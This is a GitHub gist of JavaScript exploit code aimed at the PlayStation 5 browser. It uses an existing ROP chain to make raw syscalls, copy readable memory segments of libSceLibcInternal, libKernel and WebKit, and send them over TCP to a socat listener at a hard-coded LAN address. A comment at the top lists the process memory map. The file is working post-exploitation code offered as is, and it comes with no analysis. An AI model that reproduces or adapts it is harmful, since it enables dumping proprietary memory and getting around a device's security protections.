Skip to content

Instantly share code, notes, and snippets.

@psxdev

psxdev/gist:ce3e529fe1e685c9a76a7eeef0cb8311

Created May 21, 2022 22:02
Show Gist options
  • Save psxdev/ce3e529fe1e685c9a76a7eeef0cb8311 to your computer and use it in GitHub Desktop.
Save psxdev/ce3e529fe1e685c9a76a7eeef0cb8311 to your computer and use it in GitHub Desktop.
Download ZIP
prospero dump readable segments
Raw
gistfile1.txt
/*
We can't read the execution segment yet, this code will dump readable segment for libSceLibcInternal, libKernel and libSceNpWebkit
[PROSPERO][DEBUG] pid: 73 vmap id: 80 start: 0x814ec8000 end: 0x814fa4000 size: 901120 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 81 start: 0x814fa4000 end: 0x814ff0000 size: 311296 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 82 start: 0x814ff0000 end: 0x814ff8000 size: 32768 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 83 start: 0x814ff8000 end: 0x814ffc000 size: 16384 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 84 start: 0x814ffc000 end: 0x81500c000 size: 65536 prot: 3: rw- structsize: 144 type:1 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 59 start: 0x8068b8000 end: 0x8068f8000 size: 262144 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 60 start: 0x8068f8000 end: 0x806914000 size: 114688 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 61 start: 0x806914000 end: 0x806918000 size: 16384 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 62 start: 0x806918000 end: 0x80691c000 size: 16384 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 63 start: 0x80691c000 end: 0x806950000 size: 212992 prot: 3: rw- structsize: 144 type:1 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 89 start: 0x8169f4000 end: 0x818c00000 size: 35700736 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 90 start: 0x818c00000 end: 0x819108000 size: 5275648 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 91 start: 0x819108000 end: 0x8192f0000 size: 1998848 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 92 start: 0x8192f0000 end: 0x819300000 size: 65536 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 93 start: 0x819300000 end: 0x819324000 size: 147456 prot: 3: rw- structsize: 144 type:1 path:
*/
let tcpsocket;
let ret_tcpconnect;
let first;
let sizefirst;
let second;
let sizesecond;
let third;
let sizethird;
let fourth;
let sizefourth;
let OFFSET_lk_memcpy=0x03A90;
let ret_tcpsendto;
let ret_close;
let tcpmessage_size;
let tcpsocketaddr=malloc(16,1);
p.write1(tcpsocketaddr.add32(1),2);
p.write2(tcpsocketaddr.add32(2),0x1247);
p.write4(tcpsocketaddr.add32(4),0xc01a8c0);
alert(`prepare for dumping readable segments from libSceLibcInternal set on pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:out.txt,creat,trunc`);
tcpsocket=await chain.syscall(97,2,1,0);
alert(`sys_socket: ${tcpsocket}`);
alert(`before sys_connect`);
ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
alert(`sys_connect: ${ret_tcpconnect}`);
first=parseInt(libSceLibcInternalBase,16)+901120;
sizefirst=311296;
second=first+sizefirst;
sizesecond=32768;
third=second+sizesecond;
sizethird=16384;
fourth=third+sizethird;
sizefourth=65536;
tcpmessage_size=sizefirst+sizesecond+sizethird+sizefourth;
let tcpmessage=malloc(tcpmessage_size,1);
await chain.call(libSceLibcInternalBase.add32(OFFSET_lk_memcpy), tcpmessage, libSceLibcInternalBase.add32(901120),tcpmessage_size);
alert(`memcpy done`);
ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,tcpmessage_size,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${tcpmessage_size}`);
ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
alert(`prepare for dumping readable segments from libSceKernel set on pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:out.txt,creat,trunc`);
tcpsocket=await chain.syscall(97,2,1,0);
alert(`sys_socket: ${tcpsocket}`);
alert(`before sys_connect`);
ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
alert(`sys_connect: ${ret_tcpconnect}`);
first=parseInt(libKernelBase,16)+262144;
sizefirst=114688;
second=first+sizefirst;
sizesecond=16384;
third=second+sizesecond;
sizethird=16384;
fourth=third+sizethird;
sizefourth=212992;
tcpmessage_size=sizefirst+sizesecond+sizethird+sizefourth;
let tcpmessage1=malloc(tcpmessage_size,1);
await chain.call(libSceLibcInternalBase.add32(OFFSET_lk_memcpy), tcpmessage1, libKernelBase.add32(262144),tcpmessage_size);
alert(`memcpy done`);
ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage1,tcpmessage_size,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${tcpmessage_size}`);
ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
alert(`prepare for dumping readable segments from libSceNKWebKit set on pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:out.txt,creat,trunc`);
tcpsocket=await chain.syscall(97,2,1,0);
alert(`sys_socket: ${tcpsocket}`);
alert(`before sys_connect`);
ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
alert(`sys_connect: ${ret_tcpconnect}`);
first=parseInt(libSceNKWebKitBase,16)+35700736;
sizefirst=5275648;
second=first+sizefirst;
sizesecond=1998848;
third=second+sizesecond;
sizethird=65536;
fourth=third+sizethird;
sizefourth=147456;
tcpmessage_size=sizefirst+sizesecond+sizethird+sizefourth;
let tcpmessage2=malloc(tcpmessage_size,1);
await chain.call(libSceLibcInternalBase.add32(OFFSET_lk_memcpy), tcpmessage2, libSceNKWebKitBase.add32(35700736),tcpmessage_size);
alert(`memcpy done`);
ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage2,tcpmessage_size,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${tcpmessage_size}`);
ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment